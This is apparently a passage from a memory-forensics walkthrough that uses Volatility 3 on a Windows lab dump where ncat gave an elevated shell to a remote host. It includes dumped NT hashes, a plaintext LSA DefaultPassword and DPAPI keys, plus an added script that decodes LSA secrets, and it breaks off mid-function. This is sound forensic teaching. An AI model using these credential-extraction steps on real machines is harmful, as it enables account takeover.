0xd187c1e279e0  \Windows\Prefetch\NCAT.EXE-4B4B887F.pf  216
0xd187c1e2a280  \ProgramData\chocolatey\bin\ncat.exe    216
0xd187c1e32750  \Windows\Prefetch\NCAT.EXE-1B3976EF.pf  216
0xd187c1e34820  \ncat-0 216
0xd187c1e349b0  \ncat-0 216

We see at least the path of the file, a second copy of ncat.exe under \ProgramData\chocolatey\bin (most likely the Chocolatey shim that launches the portable binary, which would explain the ncat.exe-spawns-ncat.exe pair in pslist), the \ncat-0 object that ncat uses as a named pipe to plumb cmd.exe's standard handles to the socket, and two prefetch entries. A prefetch file name carries a hash of the executable's full path, so two different hashes mean ncat.exe has been executed from two different locations, matching the two paths above.

Looking at the MFTScan plugin, which carves NTFS MFT records out of memory; the four timestamps on each row come from the record's $FILE_NAME attribute (created, modified, MFT-updated, accessed). The two prefetch files were created at 18:15:47, about seven minutes before the dump, and the ncat.exe.log entries date from 2022-02-05, so the tool had been on the box for weeks.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.mftscan.MFTScan | grep -i ncat
* 0xbb0681ad38b00       FILE    104014  2       File    Archive FILE_NAME       2022-02-05 20:57:48.000000      2022-02-05 20:57:48.000000  2022-02-05 20:57:48.000000       2022-02-05 20:57:48.000000      ncat.exe.log
* 0xbb0681ad3928        FILE    104014  2       File    Archive FILE_NAME       2022-02-05 20:57:48.000000      2022-02-05 20:57:48.000000  2022-02-05 20:57:48.000000       2022-02-05 20:57:48.000000      NCATEX~1.LOG
...
* 0xbb0688e7c920        FILE    105970  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCAT.EXE-1B3976EF.pf
* 0xbb0688e7d8b0        FILE    105974  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCATEX~2.PF
* 0xbb0688e7d920        FILE    105974  2       File    Archive FILE_NAME       2022-02-25 18:15:47.000000      2022-02-25 18:15:47.000000  2022-02-25 18:15:47.000000       2022-02-25 18:15:47.000000      NCAT.EXE-4B4B887F.pf

Looking at the environment variables for the ncat.exe process with PID 4260

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.envars.Envars --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Block   Variable        Value

...
4260    ncat.exe        0x14a4810       LOCALAPPDATA    C:\Users\SecurityNik\AppData\Local
...
4260    ncat.exe        0x14a4810       OS      Windows_NT
...
4260    ncat.exe        0x14a4810       USERDOMAIN      SECURITYNIK-WIN
4260    ncat.exe        0x14a4810       USERDOMAIN_ROAMINGPROFILE       SECURITYNIK-WIN
4260    ncat.exe        0x14a4810       USERNAME        SecurityNik
4260    ncat.exe        0x14a4810       USERPROFILE     C:\Users\SecurityNik
4260    ncat.exe        0x14a4810       user_aliases    C:\Tools\Cmder\config\user_aliases.cmd
4260    ncat.exe        0x14a4810       USER_BUILD      windows.1
4260    ncat.exe        0x14a4810       USER_MAJOR      2
4260    ncat.exe        0x14a4810       USER_MINOR      34
4260    ncat.exe        0x14a4810       USER_PATCH      1
4260    ncat.exe        0x14a4810       VENDORED_BUILD  windows.1
4260    ncat.exe        0x14a4810       VENDORED_MAJOR  2
4260    ncat.exe        0x14a4810       VENDORED_MINOR  29
4260    ncat.exe        0x14a4810       VENDORED_PATCH  1
4260    ncat.exe        0x14a4810       verbose_output  0
...

Getting information on the user and group SIDs in the token the ncat.exe process is running with.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getsids.GetSIDs --pid 4260                                                      
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process SID     Name

4260    ncat.exe        S-1-5-21-3036856633-148622980-1367235899-1001   SecurityNik
4260    ncat.exe        S-1-5-21-3036856633-148622980-1367235899-513    Domain Users
4260    ncat.exe        S-1-1-0 Everyone
4260    ncat.exe        S-1-5-114       Local Account (Member of Administrators)
4260    ncat.exe        S-1-5-32-544    Administrators
4260    ncat.exe        S-1-5-32-545    Users
4260    ncat.exe        S-1-5-4 Interactive
4260    ncat.exe        S-1-2-1 Console Logon (Users who are logged onto the physical console)
4260    ncat.exe        S-1-5-11        Authenticated Users
4260    ncat.exe        S-1-5-15        This Organization
4260    ncat.exe        S-1-5-113       Local Account
4260    ncat.exe        S-1-5-5-0-184823        Logon Session
4260    ncat.exe        S-1-2-0 Local (Users with the ability to log in locally)
4260    ncat.exe        S-1-5-64-10     NTLM Authentication
4260    ncat.exe        S-1-16-12288    High Mandatory Level

Above, we see the user is SecurityNik and is also a member of the local Administrators group. Additionally, the token carries the High Mandatory Level label (S-1-16-12288), so this is the UAC-elevated token: the shell handed to 10.0.0.110 runs as a full administrator, not with the filtered medium-integrity token a normal admin desktop session uses.

Taking a deeper look at the privileges.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp  windows.privileges.Privs --pid 4260 
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Value   Privilege       Attributes      Description

4260    ncat.exe        2       SeCreateTokenPrivilege          Create a token object
4260    ncat.exe        3       SeAssignPrimaryTokenPrivilege           Replace a process-level token
4260    ncat.exe        4       SeLockMemoryPrivilege           Lock pages in memory
4260    ncat.exe        5       SeIncreaseQuotaPrivilege        Present Increase quotas
4260    ncat.exe        6       SeMachineAccountPrivilege               Add workstations to the domain
4260    ncat.exe        7       SeTcbPrivilege          Act as part of the operating system
4260    ncat.exe        8       SeSecurityPrivilege     Present Manage auditing and security log
4260    ncat.exe        9       SeTakeOwnershipPrivilege        Present Take ownership of files/objects
4260    ncat.exe        10      SeLoadDriverPrivilege   Present Load and unload device drivers
4260    ncat.exe        11      SeSystemProfilePrivilege        Present Profile system performance
4260    ncat.exe        12      SeSystemtimePrivilege   Present Change the system time
4260    ncat.exe        13      SeProfileSingleProcessPrivilege Present Profile a single process
4260    ncat.exe        14      SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4260    ncat.exe        15      SeCreatePagefilePrivilege       Present Create a pagefile
4260    ncat.exe        16      SeCreatePermanentPrivilege              Create permanent shared objects
4260    ncat.exe        17      SeBackupPrivilege       Present Backup files and directories
4260    ncat.exe        18      SeRestorePrivilege      Present Restore files and directories
4260    ncat.exe        19      SeShutdownPrivilege     Present Shut down the system
4260    ncat.exe        20      SeDebugPrivilege        Present Debug programs
4260    ncat.exe        21      SeAuditPrivilege                Generate security audits
4260    ncat.exe        22      SeSystemEnvironmentPrivilege    Present Edit firmware environment values
4260    ncat.exe        23      SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4260    ncat.exe        24      SeRemoteShutdownPrivilege       Present Force shutdown from a remote system
4260    ncat.exe        25      SeUndockPrivilege       Present Remove computer from docking station
4260    ncat.exe        26      SeSyncAgentPrivilege            Synch directory service data
4260    ncat.exe        27      SeEnableDelegationPrivilege             Enable user accounts to be trusted for delegation
4260    ncat.exe        28      SeManageVolumePrivilege Present Manage the files on a volume
4260    ncat.exe        29      SeImpersonatePrivilege  Present,Enabled,Default Impersonate a client after authentication
4260    ncat.exe        30      SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4260    ncat.exe        31      SeTrustedCredManAccessPrivilege         Access Credential Manager as a trusted caller
4260    ncat.exe        32      SeRelabelPrivilege              Modify the mandatory integrity level of an object
4260    ncat.exe        33      SeIncreaseWorkingSetPrivilege   Present Allocate more memory for user applications
4260    ncat.exe        34      SeTimeZonePrivilege     Present Adjust the time zone of the computer's internal clock
4260    ncat.exe        35      SeCreateSymbolicLinkPrivilege   Present Required to create a symbolic link
4260    ncat.exe        36      SeDelegateSessionUserImpersonatePrivilege       Present Obtain an impersonation token for another user in the same session.

Quite a lot of privileges, which confirms that the process holds the elevated, high-integrity token. Read the Attributes column carefully, though: most of these are only Present, not Enabled. Present means the token carries the privilege and the process (or the attacker on the other end of the shell) can switch it on with AdjustTokenPrivileges at any time; only SeChangeNotifyPrivilege, SeImpersonatePrivilege and SeCreateGlobalPrivilege are enabled by default here. SeDebugPrivilege being Present is the one to note, since enabling it is all that stands between this shell and the memory of lsass.exe or any other process. Privileges with an empty Attributes column, such as SeTcbPrivilege and SeCreateTokenPrivilege, are not in the token at all: the plugin lists every privilege it knows and the column says which ones this token actually holds.

Looking at handles the ncat.exe process has opened.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.handles.Handles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Offset  HandleValue     Type    GrantedAccess   Name

...
4260    ncat.exe        0xd187c1e33d30  0x94    File    0x100020        \Device\HarddiskVolume2\Users\SecurityNik
...
4260    ncat.exe        0xd187c13b76e0  0x1f8   Event   0x1f0003
4260    ncat.exe        0xd187c1e34690  0x1fc   File    0x120089        \Device\NamedPipe\
4260    ncat.exe        0xd187c1e34500  0x204   File    0x120196        \Device\NamedPipe
4260    ncat.exe        0xd187c1e34820  0x208   File    0x120089        \Device\NamedPipe\ncat-0
4260    ncat.exe        0xd187c10dd400  0x210   Mutant  0x1f0001
4260    ncat.exe        0xd187c1bc6080  0x214   Process 0x1fffff        ncat.exe Pid 4500
...
USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION
4260    ncat.exe        0xd187c1f5ef60  0x228   Event   0x1f0003
4260    ncat.exe        0xd187c13b8de0  0x22c   Event   0x1f0003

Above, two handles tie the pieces together. The Process handle at 0x214 carries the offset 0xd187c1bc6080, which pslist showed is the EPROCESS of cmd.exe PID 4500: ncat holds a PROCESS_ALL_ACCESS (0x1fffff) handle to the child it started for --exec. The File handle at 0x208 is \Device\NamedPipe\ncat-0, the named pipe ncat uses on Windows to shuttle bytes between the socket and the child's standard handles, and the same \ncat-0 object that filescan found.

Let's now extract credentials from the host with hashdump, which locates the SAM and SYSTEM hives in memory and uses the boot key to decrypt the stored LM and NT hashes.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
User                rid     lmhash                                  nthash

Administrator       500     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Guest               501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount      503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount  504     aad3b435b51404eeaad3b435b51404ee        c2622233208f902795d9ad5bde22b628
SecurityNik         1001    aad3b435b51404eeaad3b435b51404ee        23e1d10001876b0078a9a779017fc026

Above, every account has the LM hash aad3b435b51404eeaad3b435b51404ee, the LM hash of the empty string, meaning LM hashes are not stored (the default on modern Windows). Administrator, Guest and DefaultAccount have the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password; those accounts are disabled on a default install and this is the expected value for them. SecurityNik and WDAGUtilityAccount have real password hashes that could be cracked offline or passed directly.

Looking for LSA secrets with lsadump. Despite the name, this does not read the memory of lsass.exe: it decrypts the LSA secrets stored in the SECURITY registry hive using the boot key from the SYSTEM hive, both of which are resident in the image.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp  windows.lsadump.Lsadump
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Key                 Secret                                          Hex

DefaultPassword     Testing1%òvÌBhúmÃfTî                            10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee
DPAPI_SYSTEM        ,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn                2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00
L$_RasConnectionCredentials#0   88[`Þ6Ù5N½Â§^)nTesting1             38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
NL$KM   @×ç­s¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù    40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9
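As an added example (my own code, not part of the original post or of Volatility), the script below decodes the Hex column properly: it honours the length prefix so DefaultPassword comes out as exactly Testing1, splits DPAPI_SYSTEM into its version, machine key and user key, and for the other entries reports the declared length and any wide strings. The blob layout (4-byte length, 12 bytes of version/padding, then the secret) is the one mimikatz and impacket use when reading LSA secrets; the four hex strings are copied from the output above.

```python
"""Decode the Hex column of Volatility 3 windows.lsadump output.

Added example, not part of the original post or of Volatility. Layout of a
decrypted LSA secret as implemented in mimikatz and impacket: 4-byte
little-endian length, 12 bytes of version/padding, then <length> bytes of
secret; bytes after that are padding. DPAPI_SYSTEM is 44 bytes: a DWORD
version, a 20-byte machine key and a 20-byte user key.
"""
import re
import struct

# Copied from the windows.lsadump.Lsadump output above.
LSADUMP_HEX = {
    "DefaultPassword": "10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee",
    "DPAPI_SYSTEM": "2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00",
    "L$_RasConnectionCredentials#0": "38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
    "NL$KM": "40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9",
}


def split_lsa_secret(hexstr: str):
    """Return (declared_length, secret_bytes); trailing padding is dropped."""
    raw = bytes.fromhex(hexstr.replace(" ", ""))
    if len(raw) < 16:
        raise ValueError("blob shorter than the 16-byte header")
    length = struct.unpack_from("<I", raw, 0)[0]
    return length, raw[16:16 + length]


def utf16_strings(data: bytes, min_chars: int = 4) -> list:
    """Printable UTF-16LE runs, the way strings -el would find them."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [m.decode("utf-16-le") for m in re.findall(pattern, data)]


def decode_default_password(hexstr: str) -> str:
    _, secret = split_lsa_secret(hexstr)
    return secret.decode("utf-16-le")


def decode_dpapi_system(hexstr: str) -> dict:
    length, secret = split_lsa_secret(hexstr)
    if length != 44 or len(secret) != 44:
        raise ValueError(f"unexpected DPAPI_SYSTEM length {length}")
    return {
        "version": struct.unpack_from("<I", secret, 0)[0],
        "machine_key": secret[4:24].hex(),   # decrypts system-scope DPAPI master keys
        "user_key": secret[24:44].hex(),     # decrypts the SYSTEM user's master keys
    }


def decode_lsadump(secrets: dict) -> dict:
    """Dispatch on the secret name; unknown secrets get length, hex and strings."""
    out = {}
    for name, hexstr in secrets.items():
        if name == "DefaultPassword":
            out[name] = decode_default_password(hexstr)
        elif name == "DPAPI_SYSTEM":
            out[name] = decode_dpapi_system(hexstr)
        else:
            length, secret = split_lsa_secret(hexstr)
            out[name] = {"declared_length": length,
                         "secret_hex": secret.hex(),
                         "strings": utf16_strings(secret)}
    return out


if __name__ == "__main__":
    for name, value in decode_lsadump(LSADUMP_HEX).items():
        print(f"{name}: {value}")
```

The DPAPI_SYSTEM keys are what tools such as impacket's dpapi.py take to unlock the machine's master keys offline, so they are worth saving from the dump even when the user password is not yet known.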


Looking to see what version information can be extracted.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.verinfo.VerInfo | more
Volatility 3 Framework 2.0.2    PDB scanning finished                                

PID     Process Base    Name    Major   Minor   Product Build
...
4260    ncat.exe        0x730000        ncat.exe        -       -       -       -
4260    ncat.exe        0x7ffe2ab70000  ntdll.dll       -       -       -       -
4260    ncat.exe        0x7ffe2a810000  wow64.dll       -       -       -       -
4260    ncat.exe        0x7ffe29950000  wow64win.dll    -       -       -       -
4260    ncat.exe        0x771d0000      wow64cpu.dll    -       -       -       -
...

Nothing interesting above: ncat.exe carries no version resource, so every field is a dash. The one useful detail is that wow64.dll, wow64win.dll and wow64cpu.dll are loaded, which tells us this is a 32-bit binary running under WoW64 on 64-bit Windows.

Taking a look at the Virtual Address Descriptors (VADs) of PID 4260. Each row is one memory region; the Tag, Protection, PrivateMemory flag and backing File together distinguish mapped images such as KernelBase.dll (Vad, PAGE_EXECUTE_WRITECOPY, file-backed) from private heap and stack regions (VadS, PAGE_READWRITE, no file).

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.vadinfo.VadInfo --pid 4260                                                       
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Offset  Start VPN       End VPN Tag     Protection      CommitCharge    PrivateMemory   Parent  File    File output

4260    ncat.exe        0xd187bfeeaad0  0x75c20000      0x75e33fff      Vad     PAGE_EXECUTE_WRITECOPY  28      0       0x0     \Windows\SysWOW64\KernelBase.dll     Disabled
4260    ncat.exe        0xd187c1c83e40  0x14a0000       0x14affff       VadS    PAGE_READWRITE  11      1       0xffffd187bfeeaad0      N/A Disabled
...
4260    ncat.exe        0xd187c1fac350  0x730000        0x8d0fff        Vad     PAGE_EXECUTE_WRITECOPY  18      0       0xffffd187bfeeac10  \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe    Disabled
...
 0xffffd187c01f7a60  \Windows\SysWOW64\pcapwsp.dll    Disabled
4260    ncat.exe        0xd187c01f8050  0x3d40000       0x3e3ffff       VadS    PAGE_READWRITE  4       1       0xffffd187bceac5a0      N/A Disabled
...
4260    ncat.exe        0xd187c1c7cc30  0x7ffe7000      0x7ffe7fff      VadS    PAGE_READONLY   1       1       0xffffd187c1fb03b0      N/A Disabled
4260    ncat.exe        0xd187c1c82e00  0x7f290000      0x7f291fff      VadS    PAGE_READWRITE  1       1       0xffffd187c1c7cc30      N/A Disabled
4260    ncat.exe        0xd187bfeedc30  0x7f150000      0x7f24ffff      Vad     PAGE_READONLY   0       0       0xffffd187c1c82e00      N/A Disabled
4260    ncat.exe        0xd187c158d7d0  0x7e110000      0x7e17afff      Vad     PAGE_EXECUTE_WRITECOPY  18      0       
...
4260    ncat.exe        0xd187c1faf730  0x7ffe2ab70000  0x7ffe2ad64fff  Vad     PAGE_EXECUTE_WRITECOPY  16      0       0xffffd187c10da7f0  \Windows\System32\ntdll.dll      Disabled
.......

Getting information on services with svcscan. Start type, state, service type and the PID of the hosting process are recovered from the service records in services.exe memory rather than from the registry.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.svcscan.SvcScan | more                                                           
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Offset  Order   PID     Start   State   Type    Name    Display Binary

0x1887f463cf0   399     0       SERVICE_AUTO_START      SERVICE_RUNNING SERVICE_WIN32_SHARE_PROCESS     RpcEptMapper    RPC Endpoint Mapper -
0x1887f463d00   398     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_WIN32_OWN_PROCESS       rpcapd  rpcapd  N/A
0x1887f463960   397     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_WIN32_SHARE_PROCESS     RmSvc   RmSvc   N/A
0x1887f463ed0   396     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_KERNEL_DRIVER   rhproxy rhproxy N/A
0x1887f468b10   395     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_KERNEL_DRIVER   RFCOMM  RFCOMM  N/A
...

... and the service SIDs. Every service gets a deterministic S-1-5-80-... SID (the NT SERVICE\name principal), which is how a service shows up in ACLs and event logs; this table maps those SIDs back to service names.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getservicesids.GetServiceSIDs | more                                             
Volatility 3 Framework 2.0.2    PDB scanning finished                                

SID     Service

S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865   .NET CLR Networking 4.0.0.0
S-1-5-80-1135273183-3738781202-689480478-891280274-255333391    .NET Memory Cache 4.0
S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware
S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc
S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036  AarSvc_2ea6a
S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179  AcpiDev
S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex
S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408  acpipagr
....
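As an added example (my own code, not part of the original post or of Volatility), the function below derives a service SID from its name so that an S-1-5-80 SID found in an ACL or event log can be resolved against the names svcscan listed. The derivation is the standard one: SHA-1 over the UTF-16LE encoding of the upper-cased service name, read as five little-endian DWORDs. Upper-casing uses Python's str.upper(), which matches Windows for ASCII service names; the four name/SID pairs are copied from the output above for cross-checking.

```python
"""Derive and resolve Windows service SIDs (S-1-5-80-...).

Added example, not part of the original post or of Volatility. A service SID
is S-1-5-80- followed by the five little-endian DWORDs of
SHA-1(UTF-16LE(UPPER(service name))). str.upper() is used for the
upper-casing, which matches Windows for ASCII names.
"""
import hashlib
import struct


def service_sid(service_name: str) -> str:
    digest = hashlib.sha1(service_name.upper().encode("utf-16-le")).digest()
    return "S-1-5-80-" + "-".join(str(n) for n in struct.unpack("<5I", digest))


def resolve_service_sids(sids: list, candidate_names: list) -> dict:
    """sid -> service name (or None) given the names svcscan recovered.

    The mapping is a hash, so it can only be reversed against a candidate list.
    """
    table = {service_sid(name): name for name in candidate_names}
    return {sid: table.get(sid) for sid in sids}


# Copied from the getservicesids output above.
PLUGIN_ROWS = {
    ".NET CLR Networking 4.0.0.0": "S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865",
    "3ware": "S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947",
    "AarSvc": "S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708",
    "acpiex": "S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021",
}


def check_against_plugin(rows: dict) -> dict:
    """name -> True when this derivation reproduces the SID the plugin printed."""
    return {name: service_sid(name) == sid for name, sid in rows.items()}


if __name__ == "__main__":
    print(check_against_plugin(PLUGIN_ROWS))
    print(service_sid("TrustedInstaller"))
    print(resolve_service_sids([service_sid("RpcEptMapper")], ["RpcEptMapper", "rpcapd"]))
```

Because the SID is a hash of the name, an unfamiliar S-1-5-80 SID in a log can only be attributed by hashing candidate names; the svcscan output is the natural candidate list for the host being examined.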

Leveraging the malfind module. It does not find malware as such: it flags regions that are both writable and executable and are not backed by a mapped image, which is the shape injected code usually has, and dumps the first bytes of each hit as hex and disassembly. The single hit in ncat.exe is one 4 KiB private RWX page at 0xf40000. Its hexdump carries the wide string C:\Tools\Cmder\vendor\ and the stub saves flags and registers before calling 0x75d4b770, an address inside the KernelBase.dll mapping seen in the VAD output, so the region needs to be dumped and attributed before it is called malicious.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Start VPN       End VPN Tag     Protection      CommitCharge    PrivateMemory   File output     Hexdump Disasm

4260    ncat.exe        0xf40000        0xf40fff        VadS    PAGE_EXECUTE_READWRITE|PAGE_NOCACHE     1       1       Disabled
68 90 4f 25 77 9c 60 68 h.O%w.`h
14 00 f4 00 e8 5f b7 e0 ....._..
74 61 9d c3 43 00 3a 00 ta..C.:.
5c 00 54 00 6f 00 6f 00 \.T.o.o.
6c 00 73 00 5c 00 43 00 l.s.\.C.
6d 00 64 00 65 00 72 00 m.d.e.r.
5c 00 76 00 65 00 6e 00 \.v.e.n.
64 00 6f 00 72 00 5c 00 d.o.r.\.
0xf40000:       push    0x77254f90
0xf40005:       pushfd
0xf40006:       pushal
0xf40007:       push    0xf40014
0xf4000c:       call    0x75d4b770
...
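As an added example (my own code, not part of the original post or of Volatility), the script below applies the malfind rule to vadinfo rows and triages the flagged page. The rule follows what Volatility 3's malfind does as I read its source: a region must be writable and executable, and either private VadS memory or a non-private mapping whose protection is not PAGE_EXECUTE_WRITECOPY (the normal state of a loaded image); the plugin's check for an all-zero first page is approximated here with CommitCharge > 0, since the table rows carry no data. The vadinfo rows and the hexdump are copied from the output above, plus one constructed row for the 0xf40000 region that malfind reported (its Offset and Parent are not on the page, so 0x0 stands in).

```python
"""Apply the malfind heuristic to vadinfo rows and triage a flagged region.

Added example, not part of the original post or of Volatility. The rule
mirrors Volatility 3's malfind filter: EXECUTE and WRITE in the protection,
then either private VadS memory or a non-private mapping that is not
PAGE_EXECUTE_WRITECOPY. The plugin's empty-page check is approximated with
CommitCharge > 0 because table rows carry no memory contents.
"""
import re

COLUMNS = ("pid", "process", "offset", "start", "end", "tag", "protection",
           "commit", "private", "parent", "file", "file_output")

# Rows copied from the vadinfo output above. The last row is CONSTRUCTED for
# the region malfind flagged: Offset and Parent are not on the page (0x0 stands in).
VADINFO_ROWS = r"""
4260    ncat.exe        0xd187bfeeaad0  0x75c20000      0x75e33fff      Vad     PAGE_EXECUTE_WRITECOPY  28      0       0x0     \Windows\SysWOW64\KernelBase.dll     Disabled
4260    ncat.exe        0xd187c1c83e40  0x14a0000       0x14affff       VadS    PAGE_READWRITE  11      1       0xffffd187bfeeaad0      N/A Disabled
4260    ncat.exe        0xd187c1fac350  0x730000        0x8d0fff        Vad     PAGE_EXECUTE_WRITECOPY  18      0       0xffffd187bfeeac10  \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe    Disabled
4260    ncat.exe        0xd187c01f8050  0x3d40000       0x3e3ffff       VadS    PAGE_READWRITE  4       1       0xffffd187bceac5a0      N/A Disabled
4260    ncat.exe        0xd187c1c7cc30  0x7ffe7000      0x7ffe7fff      VadS    PAGE_READONLY   1       1       0xffffd187c1fb03b0      N/A Disabled
4260    ncat.exe        0xd187bfeedc30  0x7f150000      0x7f24ffff      Vad     PAGE_READONLY   0       0       0xffffd187c1c82e00      N/A Disabled
4260    ncat.exe        0xd187c1faf730  0x7ffe2ab70000  0x7ffe2ad64fff  Vad     PAGE_EXECUTE_WRITECOPY  16      0       0xffffd187c10da7f0  \Windows\System32\ntdll.dll      Disabled
4260    ncat.exe        0x0     0xf40000        0xf40fff        VadS    PAGE_EXECUTE_READWRITE|PAGE_NOCACHE     1       1       0x0     N/A     Disabled
"""

# Copied from the malfind hexdump above (8 bytes per line, ASCII column after).
MALFIND_HEXDUMP = r"""
68 90 4f 25 77 9c 60 68 h.O%w.`h
14 00 f4 00 e8 5f b7 e0 ....._..
74 61 9d c3 43 00 3a 00 ta..C.:.
5c 00 54 00 6f 00 6f 00 \.T.o.o.
6c 00 73 00 5c 00 43 00 l.s.\.C.
6d 00 64 00 65 00 72 00 m.d.e.r.
5c 00 76 00 65 00 6e 00 \.v.e.n.
64 00 6f 00 72 00 5c 00 d.o.r.\.
"""


def parse_vadinfo(text: str) -> list:
    """One dict per row; header, blank and truncated lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(COLUMNS):
            continue
        row = dict(zip(COLUMNS, parts))
        row["commit"] = int(row["commit"])
        row["private"] = int(row["private"])
        rows.append(row)
    return rows


def is_malfind_hit(vad: dict) -> bool:
    prot = vad["protection"]
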